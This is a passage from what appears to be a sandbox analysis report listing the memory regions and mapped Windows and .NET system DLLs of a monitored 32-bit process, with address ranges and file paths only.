"private_0x00000000008e0000" filename = "" Region: id = 1645 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1646 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1647 start_va = 0x2020000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 1648 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1653 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1654 start_va = 0x21f0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1655 start_va = 0x2120000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 1656 start_va = 0x840000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1657 start_va = 0x41f0000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 1663 start_va = 0x42f0000 end_va = 0x4626fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1664 start_va = 0x6a860000 end_va = 0x6ba87fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll") Region: id = 1665 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1666 start_va = 0x4630000 end_va = 0x46c0fff monitored = 0 entry_point = 0x4668cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1668 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1669 start_va = 0x4630000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 1671 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1672 start_va = 0x69eb0000 end_va = 0x6a85bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll") Region: id = 1673 start_va = 0x6c350000 end_va = 0x6ca61fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 1674 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1675 start_va = 0x6c2d0000 end_va = 0x6c34dfff monitored = 1 entry_point = 0x6c2d1140 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 1676 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1677 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1678 start_va = 0x69d20000 end_va = 0x69eacfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll") Region: id = 1679 start_va = 0x690c0000 end_va = 0x69d18fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll") Region: id = 1680 start_va = 0x4630000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 1681 start_va = 0x4720000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1682 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1683 start_va = 0x8a0000 end_va = 0x8a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1684 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 1685 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1686 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1687 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1688 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1689 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1690 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1691 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1692 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1693 start_va = 0x704d0000 end_va = 0x704e2fff monitored = 0 entry_point = 0x704d9950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1694 start_va = 0x704a0000 end_va = 0x704cefff monitored = 0 entry_point = 0x704b95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1695 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1700 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1701 start_va = 0x68fa0000 end_va = 0x690bbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\d2f554a0c84513cd793fdcd77a86dab1\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\d2f554a0c84513cd793fdcd77a86dab1\\system.management.ni.dll") Region: id = 1702 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 1703 start_va = 0x4630000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 1704 start_va = 0x4690000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 1705 start_va = 0x4730000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 1706 start_va = 0x7fe60000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe60000" filename = "" Region: id = 1707 start_va = 0x7fe50000 end_va = 0x7fe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 1708 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 1709 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1710 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 1711 start_va = 0x6c2b0000 end_va = 0x6c2cbfff monitored = 0 entry_point = 0x6c2baa90 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 1712 start_va = 0x6c240000 end_va = 0x6c2a6fff monitored = 0 entry_point = 0x6c25b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1713 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1714 start_va = 0x46a0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1715 start_va = 0x46e0000 end_va = 0x471ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 1716 start_va = 0x4830000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 1717 start_va = 0x4930000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 1718 start_va = 0x4a30000 end_va = 0x4a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1719 start_va = 0x4a70000 end_va = 0x4b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 1720 start_va = 0x4b70000 end_va = 0x4baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 1721 start_va = 0x4bb0000 end_va = 0x4caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 1722 start_va = 0x6c230000 end_va = 0x6c23cfff monitored = 0 entry_point = 0x6c233520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1723 start_va = 0x6c220000 end_va = 0x6c229fff monitored = 1 entry_point = 0x6c2239f9 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 1724 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1725 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1726 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1727 start_va = 0x6d2b0000 end_va = 0x6d2c0fff monitored = 0 entry_point = 0x6d2b8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1728 start_va = 0x68ee0000 end_va = 0x68f9efff monitored = 0 entry_point = 0x68f11e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1732 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1733 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1734 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1735 start_va = 0x21d0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1736 start_va = 0x4670000 end_va = 0x467ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 1737 start_va = 0x4680000 end_va = 0x468ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 1738 start_va = 0x4cb0000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 1739 start_va = 0x21d0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1740 start_va = 0x68c30000 end_va = 0x68ed7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runteb92aa12#\\43ca3f2fcd379964cef1dc5898cb9248\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runteb92aa12#\\43ca3f2fcd379964cef1dc5898cb9248\\system.runtime.serialization.ni.dll") Region: id = 1741 start_va = 0x21d0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1742 start_va = 0x6c200000 end_va = 0x6c21dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\SMDiagnostics\\607f34b8be4f2014b99872617699b357\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\smdiagnostics\\607f34b8be4f2014b99872617699b357\\smdiagnostics.ni.dll") Region: id = 1743 start_va = 0x68b40000 end_va = 0x68c2efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\1b51e779650e38bb712f3e535efcf132\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\1b51e779650e38bb712f3e535efcf132\\system.configuration.ni.dll") Region: id = 1744 start_va = 0x68420000 end_va = 0x68b35fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\1f87b5140145c221b5201351fffc52d8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\1f87b5140145c221b5201351fffc52d8\\system.xml.ni.dll") Region: id = 1745 start_va = 0x68370000 end_va = 0x68414fff monitored = 0 entry_point = 0x6838ac50 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1746 start_va = 0x68340000 end_va = 0x68362fff monitored = 0 entry_point = 0x68345570 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1747 start_va = 0x68330000 end_va = 0x6833ffff monitored = 0 entry_point = 0x68333820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1748 start_va = 0x21d0000 end_va = 0x21d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1749 start_va = 0x72100000 end_va = 0x7214efff monitored = 0 entry_point = 0x7210d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1750 start_va = 0x4670000 end_va = 0x4671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004670000" filename = "" Region: id = 1751 start_va = 0x4680000 end_va = 0x4680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004680000" filename = "" Region: id = 1752 start_va = 0x4cb0000 end_va = 0x4d8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1753 start_va = 0x4d90000 end_va = 0x4dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d90000" filename = "" Region: id = 1754 start_va = 0x4dd0000 end_va = 0x4ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 1755 start_va = 0x70760000 end_va = 0x707fafff monitored = 0 entry_point = 0x7079f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1756 start_va = 0x70800000 end_va = 0x70811fff monitored = 0 entry_point = 0x70804510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1757 start_va = 0x72040000 end_va = 0x7206efff monitored = 0 entry_point = 0x7204bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1758 start_va = 0x75250000 end_va = 0x75256fff monitored = 0 entry_point = 0x75251e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1759 start_va = 0x71f80000 end_va = 0x71f92fff monitored = 0 entry_point = 0x71f825d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1760 start_va = 0x71f60000 end_va = 0x71f73fff monitored = 0 entry_point = 0x71f63c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1761 start_va = 0x4ed0000 end_va = 0x4ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1762 start_va = 0x4ed0000 end_va = 0x4ed8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1763 start_va = 0x4ed0000 end_va = 0x4ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1764 start_va = 0x4ed0000 end_va = 0x4ed8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1765 start_va = 0x4ed0000 end_va = 0x4ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1766 start_va = 0x4ed0000 end_va = 0x4ed8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1767 start_va = 0x4ed0000 end_va = 0x4f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 1768 start_va = 0x4f10000 end_va = 0x500ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 1769 start_va = 0x5010000 end_va = 0x5020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005010000" filename = "" Region: id = 1770 start_va = 0x72070000 end_va = 0x720f3fff monitored = 0 entry_point = 0x72096530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1771 start_va = 0x70750000 end_va = 0x70757fff monitored = 0 entry_point = 0x70751fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1772 start_va = 0x72030000 end_va = 0x72037fff monitored = 0 entry_point = 0x72031920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1773 start_va = 0x71fe0000 end_va = 0x72026fff monitored = 0 entry_point = 0x71ff58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1774 start_va = 0x68260000 end_va = 0x68322fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Servd1dec626#\\80366b2f53761589c602827eb7cee9f2\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.servd1dec626#\\80366b2f53761589c602827eb7cee9f2\\system.servicemodel.internals.ni.dll") Region: id = 1775 start_va = 0x5030000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 1776 start_va = 0x5040000 end_va = 0x504ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 1777 start_va = 0x5050000 end_va = 0x505ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005050000" filename = "" Region: id = 1778 start_va = 0x5060000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005060000" filename = "" Region: id = 1779 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1780 start_va = 0x5080000 end_va = 0x508ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1781 start_va = 0x5030000 end_va = 0x506ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 1782 start_va = 0x5090000 end_va = 0x518ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 1898 start_va = 0x5190000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005190000" filename = "" Region: id = 1899 start_va = 0x51d0000 end_va = 0x52cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 1900 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1901 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1902 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1903 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1904 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1905 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1906 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1907 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1908 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1909 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1910 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1911 start_va = 0x52d0000 end_va = 0x52dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1912 start_va = 0x75670000 end_va = 0x75675fff monitored = 0 entry_point = 0x75671460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1913 start_va = 0x5070000 end_va = 0x507ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 1914 start_va = 0x52d0000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 1915 start_va = 0x5310000 end_va = 0x534ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 1916 start_va = 0x5350000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 1917 start_va = 0x5360000 end_va = 0x536ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 1918 start_va = 0x5350000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 1919 start_va = 0x5350000 end_va = 0x535ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 1920 start_va = 0x5360000 end_va 